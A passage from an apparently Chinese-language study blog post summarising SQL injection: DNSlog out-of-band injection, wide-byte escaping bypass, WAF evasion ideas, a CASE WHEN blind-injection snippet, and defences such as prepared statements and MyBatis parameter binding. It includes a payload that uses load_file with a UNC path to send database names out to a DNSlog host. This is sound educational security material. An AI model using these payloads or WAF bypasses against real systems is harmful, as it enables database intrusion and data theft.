<li><p>原理：注入语句调用了能够进行域名访问的函数，访问域名，便会想DNS服务器请求信息，相应的信息便保存在了DNSlog文件中。</p>
</li>
<li><p>要求：Windows，secure_file_priv 不能为NULL</p>
<ul>
<li>load_file函数在Linux下是无法用来做dnslog攻击的，因为在这里就涉及到Windows的一个小Tips——UNC路径。</li>
<li>UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。</li>
<li>因为Linux没有UNC路径这个东西，所以当MySQL处于Linux系统中的时候，是不能使用这种方式外带数据的</li>
</ul>
</li>
<li><p>注入场景：</p>
<ul>
<li>在DNSlog平台（<a target="_blank" rel="noopener" href="http://ceye.io),注册账号,会分配一个三级域名,假设为/">http://ceye.io），注册账号，会分配一个三级域名，假设为</a> xxx.ceye.io，该网站会记录向xxx.ceye.io的请求日志。</li>
</ul>
</li>
<li><p>需要确保用户权限为高权限，且mysql变量 secure_file_priv 为空，不能有路径或者是null</p>
</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; and if((select load_file(concat(&#x27;</span>\\\\\\\\\<span class="string">&#x27;,(select database()),&#x27;</span>.xxxx.ceye.io\\abc<span class="string">&#x27;))),1,0)--+</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>\\database().xxx.ceye.io\abc</p>
<ul>
<li>mysql会去访问所给域名，以得到abc文件，向DNS服务器请求后，就会留下DNSlog，从而得到了database()</li>
</ul>
</li>
<li><p>面对SQL注入过程中没有回显的情况下，只能通过盲注的方式来判断是否存在SQL注入，但是，使用盲注，手工测试是需要花费大量的时间的，可能会想到使用sqlmap直接去跑出数据，但在实际测试中，使用sqlmap跑盲注，有很大的几率，网站把ip给封掉，这就影响了我们的测试进度。</p>
</li>
</ul>
<h2 id="7、加解密注入"><a href="#7、加解密注入" class="headerlink" title="7、加解密注入"></a>7、加解密注入</h2><ul>
<li>网站会对传递的参数进行加密，将参数进行相应加密后再上传。</li>
<li>解决办法：<ul>
<li>直接使用工具的加解密模块。</li>
<li>php存在file_get_content($url) 函数，可以访问网站内容</li>
<li>编写脚本作为中转站，工具访问脚本，脚本加上加密参数后，在访问真实网站。</li>
</ul>
</li>
</ul>
<h2 id="8、宽字节绕过："><a href="#8、宽字节绕过：" class="headerlink" title="8、宽字节绕过："></a>8、宽字节绕过：</h2><ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/kongzhian/article/details/110192472">https://blog.csdn.net/kongzhian/article/details/110192472</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41617034/article/details/106387973">https://blog.csdn.net/qq_41617034/article/details/106387973</a></li>
<li>gbk编码<ul>
<li>0xd50×5c 对应了汉字“誠 ”，URL编码用百分号加字符的16进制编码表示字符，于是 %d5%5c 经URL解码后为“誠”。</li>
</ul>
</li>
<li>注入原理：<ul>
<li>为了绕过magic_quotes_gpc的转移反斜杠,于是乎我们开始导入宽字节的概念</li>
<li>我们发现\的编码是%5c，然后我们会想到传参一个字符想办法凑成一个gbk字符,例如：‘運’字是%df%5c</li>
<li>SELECT * FROM users WHERE id&#x3D;’1&#39;‘ LIMIT 0,1</li>
<li>这条语句因为\使我们无法去注入，那么我们是不是可以用%df吃到%5c,因为如果用GBK编码的话这个就是運，然后成功的让！</li>
<li>SELECT * FROM users WHERE id&#x3D;’1�\‘#’ LIMIT 0,1</li>
<li><strong>�\ 实际上就是那个運字</strong></li>
</ul>
</li>
<li>目标站点对于特殊字符的转义（单双引号）前面会添加斜杠&#x2F;，斜杠&#x2F; url 编码是 %5c，如果目标站点使用的是 gbk 编码，则可以构造 payload为%df 加 单引号，%df 与%5c 进行结合成为一个汉字，而单引号则逃逸了出去。</li>
<li>于PHP utf-8编码 数据库GBK编码，PHP发送请求到mysql时经过一次gbk编码，因为GBK是双字节编码，所以我们提交的%df这个字符和转译的反斜杠组成了新的汉字，然后数据库处理的时候是根据GBK去处理的，然后单引号就逃逸了出来</li>
</ul>
<h1 id="四、WAF绕过"><a href="#四、WAF绕过" class="headerlink" title="四、WAF绕过"></a>四、WAF绕过</h1><p><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221853275.png" alt="image-20230315205948521"></p>
<h2 id="1、WAF工作机制："><a href="#1、WAF工作机制：" class="headerlink" title="1、WAF工作机制："></a>1、WAF工作机制：</h2><ul>
<li>工作原理：<ul>
<li>预处理：<ul>
<li>首先在接收到数据请求流量时会先判断是否为HTTP&#x2F;HTTPS请求</li>
<li>查看此URL请求是否在白名单之内，在白名单列表里，直接交给后端Web服务器进行响应处理</li>
<li>不在白名单之内的对数据包解析后进入到规则检测部分</li>
</ul>
</li>
<li>规则检查：<ul>
<li>每一种WAF产品都有自己独特的检测规则体系</li>
<li>解析后的数据包会进入到检测体系中进行规则匹配</li>
</ul>
</li>
<li>处理模块：<ul>
<li>不同的检测结果，做出不同的安全防御动作</li>
<li>符合规则则交给后端Web服务器进行响应处理</li>
<li>不符合规则的请求会执行相关的阻断、记录、告警处理</li>
</ul>
</li>
<li>日志记录：<ul>
<li>将拦截处理的日志记录下来，方便用户在后续中可以进行日志查看分析</li>
</ul>
</li>
</ul>
</li>
<li>分类：<ul>
<li>软WAF:<ul>
<li>软件WAF，安装过程比较简单，需要安装到需要安全防护的web服务器上，以<strong>纯软件</strong>的方式实现</li>
<li>安全狗，云锁，D盾等</li>
</ul>
</li>
<li>硬WAF:<ul>
<li>硬件WAF，比较昂贵，支持多种方式部署到Web服务器前端，识别外部的异常流量，并进行阻断拦截</li>
<li>Imperva、天清WAG等</li>
</ul>
</li>
<li>云WAF：<ul>
<li>配置DNS，使网站首先解析到云WAFip（一般在CDN中），在请求url时，数据包先经过云WAF进行检测，通过再将数据包流给主机</li>
<li>阿里云云盾，腾讯云WAF等</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="2、绕过思路："><a href="#2、绕过思路：" class="headerlink" title="2、绕过思路："></a>2、绕过思路：</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/264593.html">https://www.freebuf.com/articles/web/264593.html</a></p>
<ul>
<li><p>架构层绕过：</p>
<ul>
<li>数据先进入waf在进入服务器：<ul>
<li>直接找出服务器真实ip进行访问</li>
</ul>
</li>
<li>waf只防护不同网段？不同服务器？不同页面？：<ul>
<li>在内部服务之间进行访问，即可绕过waf</li>
</ul>
</li>
<li>边界漏洞：<ul>
<li>ssrf漏洞，利用存在缺陷的web应用作为代理攻击远程和本地的服务器</li>
<li>目标服务器向缺陷服务器发起请求</li>
</ul>
</li>
</ul>
</li>
<li><p>资源角度：</p>
<ul>
<li>waf检测数据有大小限制：<ul>
<li>使用POST请求，对服务器请求很大资源逃逸sql注入语句</li>
</ul>
</li>
</ul>
</li>
<li><p>协议层面：</p>
<ul>
<li>waf过滤请求不同<ul>
<li>如只过滤GET，可以考虑POST请求</li>
</ul>
</li>
<li>waf过滤文件格式不同：<ul>
<li>仅对Content-Type为application&#x2F;x-www-form-urlencoded数据格式进行过滤</li>
<li>将Content-Type格式修改为multipart&#x2F;form-data,即可绕过waf</li>
</ul>
</li>
<li>参数污染：<ul>
<li>不同脚本对多次提交的参数处理不同，如php+apache，对于多次提交的参数，只接受最后一次提交的</li>
<li>将注入参数在不同位置提交，可能绕过WAF的检测</li>
<li>猜想原因：WAF检测的是url，实际进入脚本的是参数</li>
</ul>
</li>
</ul>
</li>
<li><p>规则层面：</p>
<ul>
<li><p>大小写：</p>
<ul>
<li>WAF仅过滤了小写，而为过滤大写</li>
</ul>
</li>
<li><p>编码解码：</p>
<ul>
<li>脚本对提交的参数就行了解码处理</li>
<li>需要将提交的参数进行相应编码</li>
</ul>
</li>
<li><p>加密解密：</p>
</li>
<li><p>等价函数：</p>
<ul>
<li>当某个函数被过滤时，可以寻找等价函数</li>
<li>或者改变函数参数的书写</li>
</ul>
</li>
<li><p>空格被过滤：</p>
<ul>
<li><p>mysql可以使用+或者空白符(不同数据库有区别)代替</p>
</li>
<li><p>使用注释 &#x2F;**&#x2F;代替</p>
</li>
</ul>
</li>
<li><p>双关键字：</p>
<ul>
<li>WAF强行去除关键字，再正常给网站处理</li>
<li>如select被去除，则使用 selselectect，select被去除一次后，仍然是select</li>
</ul>
</li>
<li><p>内联注释：</p>
<ul>
<li>SQL中&#x2F;**&#x2F;是多行注释，但mysql扩展了含义，如果注释中有 ! 语句仍然被执行</li>
</ul>
</li>
</ul>
</li>
</ul>
<h1 id="五、防御SQL注入："><a href="#五、防御SQL注入：" class="headerlink" title="五、防御SQL注入："></a>五、防御SQL注入：</h1><h2 id="1、常见思路："><a href="#1、常见思路：" class="headerlink" title="1、常见思路："></a>1、常见思路：</h2><ul>
<li><p>php魔术引号：Magic Quote是一个自动将进入 PHP 脚本的数据进行转义的过程，php5.3之后不再有</p>
<ul>
<li>开关：php.ini文件中修改magic_quotes_gpc参数</li>
<li>作用：当打开时，所有的 ‘（单引号），”（双引号），\（反斜线）都会被自动加上一个反斜线进行转义。”</li>
</ul>
</li>
<li><p>后端代码实验内置函数：   </p>
<ul>
<li>直接判断传来变量的类型，不符合直接过滤或报错。</li>
</ul>
</li>
<li><p><strong>关键字过滤：</strong></p>
<ul>
<li>php脚本：$id&#x3D;str_replace(“select”,$id,”xxxx”);&#x2F;&#x2F;把参数中的select替换</li>
</ul>
</li>
<li><p>直接使用WAF服务：</p>
<ul>
<li>WAF：Web Application FireWall，网络应用程序防火墙</li>
</ul>
</li>
<li><p><strong>使用预编译机制</strong></p>
<ul>
<li>尽量用预编译机制，少用字符串拼接的方式传参，它是sql注入问题的根源。</li>
</ul>
</li>
<li><p>要对特殊字符转义</p>
<ul>
<li>有些特殊字符，比如：<code>%</code>作为<code>like</code>语句中的参数时，要对其进行转义处理。</li>
</ul>
</li>
<li><p><strong>要捕获异常</strong></p>
<ul>
<li>需要对所有的异常情况进行捕获，不能让接口直接返回异常信息，因为有些异常信息中包含了sql信息，包括：库名，表名，字段名等。</li>
</ul>
</li>
<li><p><strong>使用sql注入工具，检测漏洞</strong></p>
<ul>
<li>使用sqlMap等代码检测工具，它能检测sql注入漏洞。</li>
</ul>
</li>
<li><p>监控sql语句执行情况：</p>
<ul>
<li>需要对数据库sql的执行情况进行监控，有异常情况，及时邮件或短信提醒。</li>
</ul>
</li>
<li><p><strong>数据库账号权限控制：</strong></p>
<ul>
<li>对生产环境的数据库建立单独的账号，只分配DML(数据库操作语言，即增删改查)相关权限，且不能访问系统表。</li>
</ul>
</li>
</ul>
<h2 id="2、java："><a href="#2、java：" class="headerlink" title="2、java："></a>2、java：</h2><ul>
<li><p>利用 session 防御：</p>
<ul>
<li>一些特殊的参数可以使用session的值，不用用户输入</li>
<li>select * from users where user &#x3D; “‘“ +session.getAttribute(“UserID”) + “‘“;（session在服务器内）</li>
</ul>
</li>
<li><p>预编译：</p>
<ul>
<li><code>preparestatement</code>预编译机制会在sql语句执行前，对其进行语法分析、编译和优化，其中参数位置使用占位符<code>?</code>代替了。</li>
<li>数据库系统不会将参数的内容视为SQL指令的一部分来处理</li>
<li>数据库完成SQL指令的编译后，才套用参数运行，因此就算参数中含有破坏性的指令，也不会被数据库所运行</li>
<li><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221858658.png" alt="image-20230501093301343"></li>
<li>预编译只是减轻，特殊情况下也可以绕过<ul>
<li>like模糊查询</li>
<li>动态传入的参数</li>
</ul>
</li>
</ul>
</li>
<li><p>case when注入：</p>
<ul>
<li>when 表达式 then 结果 ，当表达式为真时，取这个结果</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span></span><br><span class="line">    STUDENT_NAME,</span><br><span class="line">    (<span class="keyword">CASE</span> </span><br><span class="line">     	<span class="keyword">WHEN</span> score <span class="operator">&lt;</span> <span class="number">60</span> <span class="keyword">THEN</span> <span class="string">&#x27;不及格&#x27;</span></span><br><span class="line">        <span class="keyword">WHEN</span> score <span class="operator">&gt;=</span> <span class="number">60</span> <span class="keyword">AND</span> score <span class="operator">&lt;</span> <span class="number">80</span> <span class="keyword">THEN</span> <span class="string">&#x27;及格&#x27;</span></span><br><span class="line">        <span class="keyword">WHEN</span> score <span class="operator">&gt;=</span> <span class="number">80</span> <span class="keyword">THEN</span> <span class="string">&#x27;优秀&#x27;</span></span><br><span class="line">        <span class="keyword">ELSE</span> <span class="string">&#x27;异常&#x27;</span> <span class="keyword">END</span>) <span class="keyword">AS</span> REMARK</span><br><span class="line"><span class="keyword">FROM</span></span><br><span class="line">    <span class="keyword">TABLE</span></span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> </span><br><span class="line">	<span class="keyword">when</span> (<span class="keyword">select</span> substr(ip,&#123;i&#125;,<span class="number">1</span>)<span class="operator">=</span><span class="string">&#x27;&#123;c&#125;&#x27;</span> <span class="keyword">from</span> servers <span class="keyword">where</span> hostname<span class="operator">=</span><span class="string">&#x27;webgoat-prd&#x27;</span>) <span class="keyword">then</span> hostname</span><br><span class="line">    <span class="keyword">else</span> mac  </span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>

<ul>
<li>判断ip的第i位与c是否相等，相等返回内容为hostname，否则为mac</li>
<li>类似盲注，通过返回内容判断是否正确。</li>
</ul>
</li>
<li><p>%特殊查询绕过预编译：</p>
<ul>
<li><p>对于模糊查找like语句：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> name <span class="keyword">like</span> <span class="string">&#x27;%苏%&#x27;</span>;</span><br></pre></td></tr></table></figure>
</li>
<li><p>输入%</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> name <span class="keyword">like</span> <span class="string">&#x27;%%%&#x27;</span>;</span><br></pre></td></tr></table></figure>
</li>
<li><p>解决办法，对%转义</p>
</li>
</ul>
</li>
<li><p>java使用<code>mybatis</code>框架：</p>
<ul>
<li>在<code>mapper.xml</code>文件中，如果入参使用<code>#</code>传值，会使用预编译机制。</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">&lt;</span><span class="keyword">sql</span> id<span class="operator">=</span>&quot;query&quot;<span class="operator">&gt;</span></span><br><span class="line">   <span class="keyword">select</span> <span class="operator">*</span> fromuser</span><br><span class="line">   <span class="operator">&lt;</span><span class="keyword">where</span><span class="operator">&gt;</span></span><br><span class="line">     name <span class="operator">=</span> #&#123;name&#125;</span><br><span class="line">   <span class="operator">&lt;</span><span class="operator">/</span><span class="keyword">where</span><span class="operator">&gt;</span></span><br><span class="line"><span class="operator">&lt;</span><span class="operator">/</span><span class="keyword">sql</span><span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>绝大多数情况下，鼓励大家使用<code>#</code>这种方式传参，更安全，效率更高。</p>
</li>
<li><p>特殊情况，比如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">&lt;</span><span class="keyword">sql</span> id<span class="operator">=</span>&quot;orderBy&quot;<span class="operator">&gt;</span>   </span><br><span class="line">	<span class="keyword">order</span> <span class="keyword">by</span> $&#123;sortString&#125; </span><br><span class="line"><span class="operator">&lt;</span><span class="operator">/</span><span class="keyword">sql</span><span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>sortString字段的内容是一个方法中<strong>动态计算出来的</strong>，这种情况是没法用<code>#</code>，代替<code>$</code>的，这样程序会报错。</li>
</ul>
</li>
<li><p>解决办法：</p>
<ul>
<li>自己写个util工具过滤掉所有的注入关键字，动态计算时调用该工具。</li>
<li>如果数据源用的阿里的<a target="_blank" rel="noopener" href="https://www.zhihu.com/search?q=druid&search_source=Entity&hybrid_search_source=Entity&hybrid_search_extra=%7B%22sourceType%22:%22answer%22,%22sourceId%22:1778513564%7D">druid</a>的话，可以开启filter中的wall（防火墙），它包含了防止sql注入的功能。但是有个问题，就是它默认不允许多语句同时操作，对批量更新操作也会拦截，这就需要我们自定义<a target="_blank" rel="noopener" href="https://www.zhihu.com/search?q=filter&search_source=Entity&hybrid_search_source=Entity&hybrid_search_extra=%7B%22sourceType%22:%22answer%22,%22sourceId%22:1778513564%7D">filter</a>了。</li>
</ul>
</li>
</ul>
</li>
</ul>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="http://example.com">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2023/09/14/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">http://example.com/2023/09/14/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web%E5%AE%89%E5%85%A8/">web安全</a></div><div class="post_share"><div class="social-share" data-image="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/09/16/2022%E5%90%B4%E6%81%A9%E8%BE%BE%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0C1W1Lab01%E5%AE%9E%E9%AA%8C/" title="Jupyter Notebook打开ipynb文件报错File Load Error、Unhandled Error的玄学解决"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">Jupyter Notebook打开ipynb文件报错File Load Error、Unhandled Error的玄学解决</div></div></a></div><div class="next-post pull-right"><a href="/2023/09/13/android%E8%93%9D%E7%89%99%E5%8A%A9%E6%89%8B%E5%BC%80%E5%8F%91%E8%AE%B0%E5%BD%95/" title="快速上手android蓝牙"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">快速上手android蓝牙</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2023/09/22/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="文件上传"><div class="cover" style="background: var(--default-bg-color)"></div><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-09-22</div><div class="title">文件上传</div></div></a></div><div><a href="/2023/09/22/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/" title="XSS跨站脚本攻击"><div class="cover" style="background: var(--default-bg-color)"></div><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-09-22</div><div class="title">XSS跨站脚本攻击</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">John Doe</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">14</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">4</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Catalog</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">一、SQL注入基础：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">1、注入类型：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E6%B3%A8%E5%85%A5%E7%82%B9%E4%BD%8D%E7%BD%AE%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">2、注入点位置：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E6%9F%A5%E6%89%BE%E6%B3%A8%E5%85%A5%E7%9B%AE%E6%A0%87%EF%BC%9A"><span class="toc-number">1.3.</span> <span class="toc-text">3、查找注入目标：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81%E6%B3%A8%E5%85%A5%E6%B5%81%E7%A8%8B-Mysql-%EF%BC%9A"><span class="toc-number">1.4.</span> <span class="toc-text">4、注入流程(Mysql)：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%B8%B8%E8%A7%81%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">二、常见数据库：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E5%88%86%E7%B1%BB%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">1、分类：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81MySQL%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">2、MySQL：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81SQL-Server%EF%BC%9A"><span class="toc-number">2.3.</span> <span class="toc-text">3、SQL Server：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81Redis%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9A"><span class="toc-number">2.4.</span> <span class="toc-text">4、Redis数据库：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.</span> <span class="toc-text">三、注入类型</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">3.1.</span> <span class="toc-text">1、布尔注入：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">3.2.</span> <span class="toc-text">2、报错注入：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E5%BB%B6%E6%97%B6%E6%B3%A8%E5%85%A5"><span class="toc-number">3.3.</span> <span class="toc-text">3、延时注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="toc-number">3.4.</span> <span class="toc-text">4、堆叠注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="toc-number">3.5.</span> <span class="toc-text">5、二次注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81Dnslog%E5%AF%B9%E5%A4%96%E6%B3%A8%E5%85%A5"><span class="toc-number">3.6.</span> <span class="toc-text">6、Dnslog对外注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81%E5%8A%A0%E8%A7%A3%E5%AF%86%E6%B3%A8%E5%85%A5"><span class="toc-number">3.7.</span> <span class="toc-text">7、加解密注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8%E3%80%81%E5%AE%BD%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="toc-number">3.8.</span> <span class="toc-text">8、宽字节绕过：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%9B%E3%80%81WAF%E7%BB%95%E8%BF%87"><span class="toc-number">4.</span> <span class="toc-text">四、WAF绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81WAF%E5%B7%A5%E4%BD%9C%E6%9C%BA%E5%88%B6%EF%BC%9A"><span class="toc-number">4.1.</span> <span class="toc-text">1、WAF工作机制：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">4.2.</span> <span class="toc-text">2、绕过思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%94%E3%80%81%E9%98%B2%E5%BE%A1SQL%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">5.</span> <span class="toc-text">五、防御SQL注入：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E5%B8%B8%E8%A7%81%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">5.1.</span> <span class="toc-text">1、常见思路：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81java%EF%BC%9A"><span class="toc-number">5.2.</span> <span class="toc-text">2、java：</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/23/04_Lab3ShellCode%E7%94%9F%E6%88%90/" title="Lab03补充《计算机安全导论：深度实践》ShellCode实验">Lab03补充《计算机安全导论：深度实践》ShellCode实验</a><time datetime="2023-10-23T12:10:55.000Z" title="Created 2023-10-23 20:10:55">2023-10-23</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/04_Lab3%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA/" title="Lab03《计算机安全导论：深度实践》缓冲区溢出实验">Lab03《计算机安全导论：深度实践》缓冲区溢出实验</a><time datetime="2023-10-17T12:15:55.000Z" title="Created 2023-10-17 20:15:55">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/03_ShellShockAttack/" title="Lab02《计算机安全导论：深度实践》ShellShock实验">Lab02《计算机安全导论：深度实践》ShellShock实验</a><time datetime="2023-10-17T09:10:55.000Z" title="Created 2023-10-17 17:10:55">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/04_%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA/" title="《计算机安全导论：深度实践》第四章缓冲区溢出">《计算机安全导论：深度实践》第四章缓冲区溢出</a><time datetime="2023-10-17T09:10:55.000Z" title="Created 2023-10-17 17:10:55">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/03_ShellShock%E6%94%BB%E5%87%BB/" title="《计算机安全导论：深度实践》第三章ShellShock">《计算机安全导论：深度实践》第三章ShellShock</a><time datetime="2023-10-17T09:08:55.000Z" title="Created 2023-10-17 17:08:55">2023-10-17</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By John Doe</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between single-column and double-column"><i class="fas 